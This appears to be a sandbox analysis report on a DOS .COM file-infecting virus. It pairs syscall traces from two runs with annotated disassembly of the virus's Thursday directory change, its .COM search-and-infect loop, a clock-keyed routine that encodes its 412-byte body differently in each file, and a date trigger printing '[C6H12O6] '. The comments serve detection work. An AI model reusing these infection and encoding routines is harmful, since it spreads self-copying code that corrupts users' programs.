0x12bb3: call 0x12bb6  ; call to the next instruction pushes that instruction's own address
0x12bb6: pop dx  ; DX = run-time offset of 0x12bb6 (self-locating, no fixed load address needed)
0x12bb7: add dx, 0xa  ; DX -> 0x12bc0, the bytes immediately after ret
0x12bbb: mov ah, 9  ; INT 21h AH=09h: print the '$'-terminated string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; NOTE(review): everything from 0x12bc0 on is string data that the disassembler decoded as
; instructions after running past ret. Byte values below are reconstructed from the instruction
; encodings; they spell "[C6H12O6] $".
0x12bc0: pop bx  ; 5B = '['
0x12bc1: inc bx  ; 43 = 'C'
0x12bc2: dec ax  ; 36 48 = "6H" (0x36 was decoded as an SS: prefix)
0x12bc4: xor word ptr [bp + si], si  ; 31 32 = "12"
0x12bc6: dec di  ; 4F = 'O'
0x12bc7: pop bp  ; 36 5D = "6]"
0x12bc9: and byte ptr [si], ah  ; 20 24 = " $"; '$' terminates the AH=09h string
0x12bcb: add byte ptr [bp + si + 0x6c], al  ; 00 42 6C = NUL, "Bl": a second string appears to start here
0x12bce: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bcf: outsw dx, word ptr [si]  ; 6F = 'o'
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl  ; 64 20 53 75 = "d Su"
0x12bd4: popaw  ; last decoded item; its length is not visible, so text past "Blood Su" cannot be read from this listing
2018-12-25T11:49:14.58033086Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Directory scan loop (sandbox disassembly excerpt, 16-bit, Intel syntax).
; It starts at the return from the "Get date" call logged on the next line. Each later
; "Find next file" entry in the trace is one more pass through this loop.
2018-12-25T11:49:13.80296017Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4  ; AL = day of week from Get date (INT 21h AH=2Ah, 0 = Sunday); 4 = Thursday
0x12a7f: jne 0x12a8d  ; other weekdays skip the directory change; this run logs "Find first file" next, so it was skipped here
0x12a81: call 0x12a84  ; call/pop pair: the code finds its own run-time address
0x12a84: pop dx  ; DX = run-time offset of 0x12a84
0x12a85: add dx, 0x3b  ; DX -> 0x12abf, a path string that is not shown in this trace
0x12a89: mov ah, 0x3b  ; INT 21h AH=3Bh: change current directory to DS:DX
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e  ; INT 21h AH=4Eh: find first matching file
0x12a8f: xor cx, cx  ; CX = 0: attribute mask for the search (normal files)
0x12a91: call 0x12a94  ; same self-locating idiom as above
0x12a94: pop dx
0x12a95: add dx, 0x25  ; DX -> 0x12ab9, the search pattern (not shown; the trace opens SLEEP.COM, so presumably a .COM mask)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3  ; CF set = no match or error: leave via the stub at 0x12aa3
0x12a9d: call 0x12ac2  ; per-file routine; the Open/Read/Write/Close entries in the trace come from inside it
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88  ; exit stub; its target lies outside this excerpt
0x12aa6: mov ah, 0x4f  ; INT 21h AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3  ; CF set = no more files; the fall-through path is not part of this excerpt
2018-12-25T11:49:13.806324358Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.812335627Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.818732208Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.825402498Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.827415335Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.829935933Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.831959569Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Re-encoding of the 412-byte body before it is written to the opened file
; (sandbox disassembly excerpt, 16-bit, Intel syntax). It starts at the return from "Get time".
; For detection: the first 0x26 bytes are copied unchanged while the other 374 depend on the
; clock, so a byte signature can only anchor on the leading region (NOTE(review): the two bytes
; patched through [bx] may sit inside it; confirm) or on the logged behaviour instead.
2018-12-25T11:49:13.834600617Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh  ; DH = seconds from Get time (INT 21h AH=2Ch)
0x12b47: add ah, byte ptr [bx]  ; mix with the byte already stored at [bx] (where BX points is set before this excerpt)
0x12b49: mov byte ptr [bx], ah  ; store back; AH is the starting key for the loop below
0x12b4b: mov dl, byte ptr [0x9a]  ; NOTE(review): 0x9A = 0x80 + 0x1A, the file-size low byte if the default DTA is in use; confirm
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1  ; force the value odd, so it is never zero
0x12b55: mov byte ptr [bx + 1], dl  ; store back; DL is the per-byte key increment
0x12b58: mov cx, 0x26  ; 0x26 = 38 bytes
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]  ; first 38 bytes copied unchanged, DS:SI -> ES:DI (both set before this excerpt)
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26  ; 412 - 38 = 374 bytes left to transform
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah  ; byte += key
0x12b66: add ah, dl  ; key += increment, so every byte gets a different key
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx  ; BX restored from the stack; AH=40h takes the file handle in BX
0x12b6c: mov dx, 0xfaa0  ; DS:DX = buffer to write
0x12b6f: mov cx, 0x19c  ; 0x19c = 412, matching "Write 412 bytes" in the trace
0x12b72: mov ah, 0x40  ; INT 21h AH=40h: write to file; the int itself is past the end of this excerpt
2018-12-25T11:49:13.836659859Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.277959232Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.280097944Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.287674746Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.291054739Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.298702073Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.305602606Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.307553177Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.311811352Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.313537004Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.316584587Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.320088625Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.322729372Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.324180815Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.332165966Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.33626694Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.343078055Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.350698621Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.352515354Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.355450222Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.357135679Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.362203779Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.364489006Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.367445994Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.370669869Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.378049859Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.380590017Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.38787816Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.394584746Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.39655746Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.399939038Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.401558313Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.404383288Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.407548443Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.410646949Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.412326488Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.419911616Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.423580287Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.430902277Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.437356402Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.439539104Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.442408342Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.444067972Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.447346569Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.44945341Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.452122274Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.454290228Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.461415669Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.463851541Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.471023414Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.477730435Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.47943499Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.483787754Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.485654517Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.488818198Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.492216423Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.501202002Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.503014438Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.511642892Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.514665099Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.521281795Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.528463923Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.530185792Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.533002445Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.535532312Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.538260515Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.540461076Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.543281089Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.545303496Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.55339886Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.556097103Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.563288337Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.566191977Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.568145545Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.576555614Z 79 PC: 12aaa | Find next file (See above)
; Date-triggered message routine (0x12bae-0x12bbf) followed by its string data.
; Everything after the ret at 0x12bbf is ASCII text that the disassembler decoded
; as instructions; none of it is executed as code by the routine shown here.
2018-12-25T11:49:14.57930176Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe    ; DOS Get date returns the day of month in DL; 0xe = 14
0x12bb1: jne 0x12bbf    ; any other day: skip to ret (no Display string entry follows in this run)
0x12bb3: call 0x12bb6    ; call to the next instruction: pushes its own address
0x12bb6: pop dx    ; ...so DX = address of 0x12bb6, wherever the code was loaded
0x12bb7: add dx, 0xa    ; DX -> 0x12bc0, the data immediately after the ret below
0x12bbb: mov ah, 9    ; int 21h AH=09h: print the '$'-terminated string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; --- data from here on: the opcode bytes spell out text ---
0x12bc0: pop bx    ; 5B = '['
0x12bc1: inc bx    ; 43 = 'C'
0x12bc2: dec ax    ; two bytes long (next address is 0x12bc4); consistent with 36 48 = '6H'
0x12bc4: xor word ptr [bp + si], si    ; 31 32 = '12'
0x12bc6: dec di    ; 4F = 'O'
0x12bc7: pop bp    ; two bytes long; consistent with 36 5D = '6]'
0x12bc9: and byte ptr [si], ah    ; 20 24 = ' $' -- the '$' terminates the AH=09h string "[C6H12O6] "
0x12bcb: add byte ptr [bp + si + 0x6c], al    ; 00 42 6C = NUL, 'B', 'l' -- a second text string appears to start here
0x12bce: outsw dx, word ptr [si]    ; 6F = 'o'
0x12bcf: outsw dx, word ptr [si]    ; 6F = 'o'
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl    ; 64 20 53 75 = 'd Su'
0x12bd4: popaw    ; text continues past the end of this excerpt
2018-12-25T11:49:14.581733025Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
; File-search loop: optional directory change, then DOS find-first / find-next.
; Each match is handed to the routine at 0x12ac2; the open/read/seek/write/close
; entries in the trace (PC 12aca-12b87) all fall inside that routine's address range.
2018-12-25T13:06:51.484696703Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4    ; DOS Get date returns the day of week in AL (0 = Sunday); 4 = Thursday
0x12a7f: jne 0x12a8d    ; not Thursday: skip the directory change
0x12a81: call 0x12a84    ; call-next/pop pair: obtains the code's own address at run time,
0x12a84: pop dx    ; so data references keep working wherever the code is loaded
0x12a85: add dx, 0x3b    ; DX -> 0x12abf (path string; its contents are not shown in this trace)
0x12a89: mov ah, 0x3b    ; int 21h AH=3Bh: change current directory to the path at DS:DX
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e    ; int 21h AH=4Eh: find first matching file
0x12a8f: xor cx, cx    ; CX = 0: attribute mask for the search
0x12a91: call 0x12a94    ; same call-next/pop idiom as above
0x12a94: pop dx
0x12a95: add dx, 0x25    ; DX -> 0x12ab9 (search filespec; presumably a *.COM pattern, given the first match is SLEEP.COM)
0x12a99: int 0x21
0x12a9b: jb 0x12aa3    ; carry set = no match or error: leave the loop
0x12a9d: call 0x12ac2    ; process the file that was found
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88    ; exit path; the target lies outside this excerpt
0x12aa6: mov ah, 0x4f    ; int 21h AH=4Fh: find next matching file
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3    ; no more matches: exit
2018-12-25T13:06:51.487698969Z 78 PC: 12a9b | Find first file
2018-12-25T13:06:51.493758308Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:06:51.500359679Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T13:06:51.507521445Z 66 PC: 12b0b | Move file pointer
2018-12-25T13:06:51.509103851Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T13:06:51.511852766Z 66 PC: 12b22 | Move file pointer
2018-12-25T13:06:51.514087111Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
; Builds the 0x19c-byte (412-byte) image that the following Write call appends:
; the first 0x26 bytes are copied unchanged, the remaining 0x176 (374) bytes are
; transformed with a running additive key. Both key bytes are re-derived on every
; pass (clock seconds and a byte read from DS:0x9a), so the transformed part differs
; from file to file. For signature matching the verbatim 0x26-byte head is the
; stable part -- except for the two bytes at [bx]/[bx+1] if they lie inside it,
; which this excerpt does not show.
2018-12-25T13:06:51.516654247Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh    ; DOS Get time returns seconds in DH
0x12b47: add ah, byte ptr [bx]    ; mix with the previous key byte
0x12b49: mov byte ptr [bx], ah    ; store the new starting key
0x12b4b: mov dl, byte ptr [0x9a]    ; NOTE(review): 0x9a = default DTA (0x80) + 0x1a, the found file's size field, if DS is the PSP segment -- confirm
0x12b4f: add dl, byte ptr [bx + 1]    ; mix with the previous step byte
0x12b52: or dl, 1    ; force the step odd, so it can never be zero
0x12b55: mov byte ptr [bx + 1], dl    ; store the new step
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x26 bytes copied as-is (presumably the part that must run untransformed)
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26    ; CX = 0x176 bytes left to transform
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah    ; byte += current key
0x12b66: add ah, dl    ; key += step after every byte
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx    ; restores a value pushed before this excerpt (presumably the file handle, which AH=40h takes in BX)
0x12b6c: mov dx, 0xfaa0    ; DS:DX = buffer to write (presumably where ES:DI built the copy)
0x12b6f: mov cx, 0x19c    ; 412 bytes, matching "Write 412 bytes on handle 5" in the trace
0x12b72: mov ah, 0x40    ; int 21h AH=40h: write to file handle
2018-12-25T13:06:51.519349328Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T13:06:51.532261562Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T13:06:51.5339751Z 62 PC: 12b87 | Close file
2018-12-25T13:06:51.5412177Z 79 PC: 12aaa | Find next file
2018-12-25T13:06:51.543599921Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.549980057Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.556095707Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.557243096Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.565763695Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.567130824Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.569625073Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.572351394Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.57493764Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.576307225Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.585398272Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.588160474Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.59527033Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.602435497Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.610964768Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.613490873Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.615901256Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.618813117Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.621449664Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.62616504Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.627702454Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.635170745Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.638199948Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.644574595Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.65086278Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.652788378Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.655510078Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.656734725Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.659184893Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.661458396Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.664036195Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.6653858Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.680563149Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.683219685Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.689656262Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.696420371Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.697706183Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.700179399Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.710364185Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.713160861Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.715708369Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.719242621Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.721036886Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.728759601Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.734301972Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.741439282Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.747740508Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.749756119Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.753322986Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.754985978Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.758999888Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.761476406Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.769511576Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.772085296Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.779755166Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.782638163Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.79011097Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.796971382Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.798596572Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.802369924Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.803814106Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.805952602Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.808435284Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.810420465Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.811664286Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.81728284Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.819100059Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.826062886Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.829317618Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.830867944Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.837800099Z 79 PC: 12aaa | Find next file (See above)
; Date-triggered message routine (0x12bae-0x12bbf) followed by its string data.
; In this run the compare succeeds: the next trace entry is a Display string call
; showing '[C6H12O6] '. Everything after the ret is that text (and more), which the
; disassembler decoded as instructions; it is data, not code.
2018-12-25T13:06:51.840741868Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe    ; DOS Get date returns the day of month in DL; 0xe = 14
0x12bb1: jne 0x12bbf    ; any other day: skip to ret without printing
0x12bb3: call 0x12bb6    ; call to the next instruction: pushes its own address
0x12bb6: pop dx    ; ...so DX = address of 0x12bb6, wherever the code was loaded
0x12bb7: add dx, 0xa    ; DX -> 0x12bc0, the data immediately after the ret below
0x12bbb: mov ah, 9    ; int 21h AH=09h: print the '$'-terminated string at DS:DX
0x12bbd: int 0x21
0x12bbf: ret
; --- data from here on: the opcode bytes spell out text ---
0x12bc0: pop bx    ; 5B = '['
0x12bc1: inc bx    ; 43 = 'C'
0x12bc2: dec ax    ; two bytes long (next address is 0x12bc4): 36 48 = '6H'
0x12bc4: xor word ptr [bp + si], si    ; 31 32 = '12'
0x12bc6: dec di    ; 4F = 'O'
0x12bc7: pop bp    ; two bytes long: 36 5D = '6]'
0x12bc9: and byte ptr [si], ah    ; 20 24 = ' $' -- the '$' terminates the displayed string
0x12bcb: add byte ptr [bp + si + 0x6c], al    ; 00 42 6C = NUL, 'B', 'l' -- a second text string appears to start here
0x12bce: outsw dx, word ptr [si]    ; 6F = 'o'
0x12bcf: outsw dx, word ptr [si]    ; 6F = 'o'
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl    ; 64 20 53 75 = 'd Su'
0x12bd4: popaw    ; text continues past the end of this excerpt
2018-12-25T13:06:51.843060573Z 9 PC: 12bbf | Display string (String= '[C6H12O6] ')
2018-12-25T13:06:51.845079873Z 76 PC: 12a44 | Terminate with return code (Return code = '36')